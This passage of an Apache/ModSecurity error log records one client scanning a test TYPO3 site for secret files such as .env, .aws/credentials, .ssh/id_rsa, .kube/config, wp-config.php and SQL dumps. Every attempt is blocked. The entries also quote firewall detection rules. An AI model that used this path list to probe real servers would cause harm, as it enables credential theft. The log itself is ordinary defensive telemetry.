"ZvNMi8mFDqCQCT5sjgqUvQAAAAA"]
[Wed Sep 25 01:34:35.117080 2024] [:error] [pid 2163299] [client 109.202.99.36:34653] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZvNMi_KAGCYS62BfkUEZxwAAAAg"]
[Wed Sep 25 01:34:35.117173 2024] [:error] [pid 2163295] [client 109.202.99.36:11029] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "ZvNMi8mFDqCQCT5sjgqUvQAAAAA"]
[Wed Sep 25 01:34:35.117443 2024] [:error] [pid 2163299] [client 109.202.99.36:34653] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZvNMi_KAGCYS62BfkUEZxwAAAAg"]
[Wed Sep 25 01:34:35.117514 2024] [:error] [pid 2163295] [client 109.202.99.36:11029] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "ZvNMi8mFDqCQCT5sjgqUvQAAAAA"]
[Wed Sep 25 01:34:35.117679 2024] [:error] [pid 2163299] [client 109.202.99.36:34653] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "ZvNMi_KAGCYS62BfkUEZxwAAAAg"]
[Wed Sep 25 01:34:35.117821 2024] [:error] [pid 2163295] [client 109.202.99.36:11029] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "ZvNMi8mFDqCQCT5sjgqUvQAAAAA"]
[Wed Sep 25 01:34:35.119057 2024] [authz_core:error] [pid 2163296] [client 109.202.99.36:48005] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Wed Sep 25 01:34:35.120464 2024] [:error] [pid 2163319] [client 109.202.99.36:24111] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZvNMizi7Hvr15toPaIjbSgAAAAM"]
[Wed Sep 25 01:34:35.120705 2024] [:error] [pid 2163319] [client 109.202.99.36:24111] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZvNMizi7Hvr15toPaIjbSgAAAAM"]
[Wed Sep 25 01:34:35.120919 2024] [:error] [pid 2163319] [client 109.202.99.36:24111] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZvNMizi7Hvr15toPaIjbSgAAAAM"]
[Wed Sep 25 01:34:35.193573 2024] [:error] [pid 2163299] [client 109.202.99.36:11039] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZvNMi_KAGCYS62BfkUEZyAAAAAg"]
[Wed Sep 25 01:34:35.193796 2024] [:error] [pid 2163299] [client 109.202.99.36:11039] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZvNMi_KAGCYS62BfkUEZyAAAAAg"]
[Wed Sep 25 01:34:35.193964 2024] [:error] [pid 2163299] [client 109.202.99.36:11039] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZvNMi_KAGCYS62BfkUEZyAAAAAg"]
[Wed Sep 25 01:34:35.199102 2024] [authz_core:error] [pid 2163295] [client 109.202.99.36:18909] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Wed Sep 25 01:34:35.265589 2024] [authz_core:error] [pid 2163299] [client 109.202.99.36:2295] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Wed Sep 25 01:34:35.271004 2024] [:error] [pid 2163295] [client 109.202.99.36:13639] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZvNMi8mFDqCQCT5sjgqUvwAAAAA"]
[Wed Sep 25 01:34:35.271245 2024] [:error] [pid 2163295] [client 109.202.99.36:13639] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZvNMi8mFDqCQCT5sjgqUvwAAAAA"]
[Wed Sep 25 01:34:35.271423 2024] [:error] [pid 2163295] [client 109.202.99.36:13639] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZvNMi8mFDqCQCT5sjgqUvwAAAAA"]
[Wed Sep 25 01:34:35.344279 2024] [:error] [pid 2163299] [client 109.202.99.36:54459] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "ZvNMi_KAGCYS62BfkUEZygAAAAg"]
[Wed Sep 25 01:34:35.344627 2024] [:error] [pid 2163299] [client 109.202.99.36:54459] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "ZvNMi_KAGCYS62BfkUEZygAAAAg"]
[Wed Sep 25 01:34:35.344821 2024] [:error] [pid 2163299] [client 109.202.99.36:54459] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "ZvNMi_KAGCYS62BfkUEZygAAAAg"]
[Wed Sep 25 01:34:35.345949 2024] [:error] [pid 2163295] [client 109.202.99.36:4717] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "ZvNMi8mFDqCQCT5sjgqUwAAAAAA"]
[Wed Sep 25 01:34:35.346245 2024] [:error] [pid 2163295] [client 109.202.99.36:4717] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "ZvNMi8mFDqCQCT5sjgqUwAAAAAA"]
[Wed Sep 25 01:34:35.346411 2024] [:error] [pid 2163295] [client 109.202.99.36:4717] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "ZvNMi8mFDqCQCT5sjgqUwAAAAAA"]
[Wed Sep 25 01:34:35.417516 2024] [authz_core:error] [pid 2163299] [client 109.202.99.36:42599] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Wed Sep 25 01:34:35.488831 2024] [authz_core:error] [pid 2163299] [client 109.202.99.36:45257] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_secrets.yml
[Wed Sep 25 01:34:35.586164 2024] [:error] [pid 2163297] [client 109.202.99.36:13853] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "ZvNMi25MrhiJyZbyjRvn_wAAAAQ"]
[Wed Sep 25 01:34:35.587034 2024] [authz_core:error] [pid 2163299] [client 109.202.99.36:4889] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Wed Sep 25 01:34:35.590290 2024] [:error] [pid 2163297] [client 109.202.99.36:13853] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "ZvNMi25MrhiJyZbyjRvn_wAAAAQ"]
[Wed Sep 25 01:34:35.590489 2024] [:error] [pid 2163297] [client 109.202.99.36:13853] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "ZvNMi25MrhiJyZbyjRvn_wAAAAQ"]
[Wed Sep 25 01:34:35.588655 2024] [:error] [pid 2163296] [client 109.202.99.36:56097] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZvNMi7gdLirIQZSXk1I3cwAAAAE"]
[Wed Sep 25 01:34:35.591226 2024] [:error] [pid 2163296] [client 109.202.99.36:56097] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZvNMi7gdLirIQZSXk1I3cwAAAAE"]
[Wed Sep 25 01:34:35.591402 2024] [:error] [pid 2163296] [client 109.202.99.36:56097] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZvNMi7gdLirIQZSXk1I3cwAAAAE"]
[Wed Sep 25 01:34:35.589619 2024] [authz_core:error] [pid 2163295] [client 109.202.99.36:17861] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Wed Sep 25 01:34:35.666692 2024] [:error] [pid 2163299] [client 109.202.99.36:19929] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "ZvNMi_KAGCYS62BfkUEZzgAAAAg"]
[Wed Sep 25 01:34:35.666924 2024] [:error] [pid 2163299] [client 109.202.99.36:19929] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "ZvNMi_KAGCYS62BfkUEZzgAAAAg"]
[Wed Sep 25 01:34:35.667103 2024] [:error] [pid 2163299] [client 109.202.99.36:19929] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "ZvNMi_KAGCYS62BfkUEZzgAAAAg"]
[Wed Sep 25 01:34:35.695107 2024] [:error] [pid 2163317] [client 109.202.99.36:37057] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZvNMiw9NgSV2FUvQBEvXRAAAAAI"]
[Wed Sep 25 01:34:35.695350 2024] [:error] [pid 2163317] [client 109.202.99.36:37057] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZvNMiw9NgSV2FUvQBEvXRAAAAAI"]
[Wed Sep 25 01:34:35.695524 2024] [:error] [pid 2163317] [client 109.202.99.36:37057] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "ZvNMiw9NgSV2FUvQBEvXRAAAAAI"]
[Wed Sep 25 01:34:35.708030 2024] [:error] [pid 2163319] [client 109.202.99.36:46109] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvNMizi7Hvr15toPaIjbTQAAAAM"]
[Wed Sep 25 01:34:35.708270 2024] [:error] [pid 2163319] [client 109.202.99.36:46109] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvNMizi7Hvr15toPaIjbTQAAAAM"]
[Wed Sep 25 01:34:35.708482 2024] [:error] [pid 2163319] [client 109.202.99.36:46109] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvNMizi7Hvr15toPaIjbTQAAAAM"]
